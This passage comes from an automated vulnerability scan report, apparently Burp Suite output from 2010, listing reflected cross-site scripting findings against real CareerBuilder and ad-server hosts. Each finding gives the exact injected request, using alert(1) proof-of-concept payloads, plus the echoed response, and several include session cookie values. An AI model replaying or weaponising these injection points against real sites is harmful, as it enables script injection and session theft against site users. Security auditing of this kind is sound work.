X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.47. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_TaxAccounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 351db'-alert(1)-'2f09466539d was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197530
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:27:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.48. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_TaxAccounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21130"%20a%3db%2066d099a642a was submitted in the lr parameter. This input was echoed as 21130" a=b 66d099a642a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130"%20a%3db%2066d099a642a&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196807
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:26:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130" a=b 66d099a642a" />
...[SNIP]...

2.49. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin-clerical.careerbuilder.com
Path:   /ac.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7fe5'-alert(1)-'9425161b70b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ac.ic/Florida_Miami/?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198212
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c17e999a751943249031889b774a0aec-343070737-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B96FA49ADD94120890BA6EE7DBBB0B70BB73D4A957DF1B40E37136B4E087C94A7205966FE434239F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:37 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:25:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.50. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://admin-clerical.careerbuilder.com
Path:   /ac.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bf"%20a%3db%2039cb7791456 was submitted in the lr parameter. This input was echoed as 5f8bf" a=b 39cb7791456 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ac.ic/Florida_Miami/?lr=cbcb_mh5f8bf"%20a%3db%2039cb7791456&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197140
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=f66d76a56e6c49c092e6c437b5f1f0f0-343070714-RT-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F8EA9F59001F10D230B0487CBA3492F4EAD435A55C0CBCAA310FAAEC46756DA0F487A1EAD80AC621; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:13 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:14 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL29
Date: Sun, 14 Nov 2010 22:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh5f8bf" a=b 39cb7791456" />
...[SNIP]...

2.51. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e2b91<script>alert(1)</script>b3f2b434e17 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?placementId=20482&pid=589757e2b91<script>alert(1)</script>b3f2b434e17&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Content-Length: 2497
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=975
Connection: Keep-Alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "589757e2b91<script>alert(1)</script>b3f2b434e17"

   
                                                           </head>
...[SNIP]...

2.52. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload ad013--><script>alert(1)</script>679fce7bb3e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?placementId=20482ad013--><script>alert(1)</script>679fce7bb3e&pid=589757&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:31 GMT
Content-Length: 3759
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=961
Connection: Keep-Alive
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "20482ad013--><script>alert(1)</script>679fce7bb3e" -->
...[SNIP]...

2.53. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload b8db5--><script>alert(1)</script>6b2d12adfe5 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?placementId=20482&pid=589757&ps=-1b8db5--><script>alert(1)</script>6b2d12adfe5&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:32 GMT
Content-Length: 4202
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=959
Connection: Keep-Alive
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1b8db5--><script>alert(1)</script>6b2d12adfe5" -->
   
...[SNIP]...

2.54. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999f7"><script>alert(1)</script>20cb6235d4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH999f7"><script>alert(1)</script>20cb6235d4e;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH999f7"><script>alert(1)</script>20cb6235d4e;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.55. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d20"><script>alert(1)</script>056827e3655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&69d20"><script>alert(1)</script>056827e3655=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&69d20"><script>alert(1)</script>056827e3655=1;adiframe=y">
...[SNIP]...

2.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4831c><script>alert(1)</script>dcd50598372 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=4831c><script>alert(1)</script>dcd50598372 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=4831c><script>alert(1)</script>dcd50598372><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CAD
...[SNIP]...

2.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede1a"><script>alert(1)</script>a305855cafa was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ede1a"><script>alert(1)</script>a305855cafa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ede1a"><script>alert(1)</script>a305855cafa;adiframe=y">
...[SNIP]...

2.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5684d"><script>alert(1)</script>3285b7241f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH5684d"><script>alert(1)</script>3285b7241f3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH5684d"><script>alert(1)</script>3285b7241f3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd61c"><script>alert(1)</script>6e12a239d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&bd61c"><script>alert(1)</script>6e12a239d5=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 296

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&bd61c"><script>alert(1)</script>6e12a239d5=1;adiframe=y">
...[SNIP]...

2.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]  previous  next

Summary

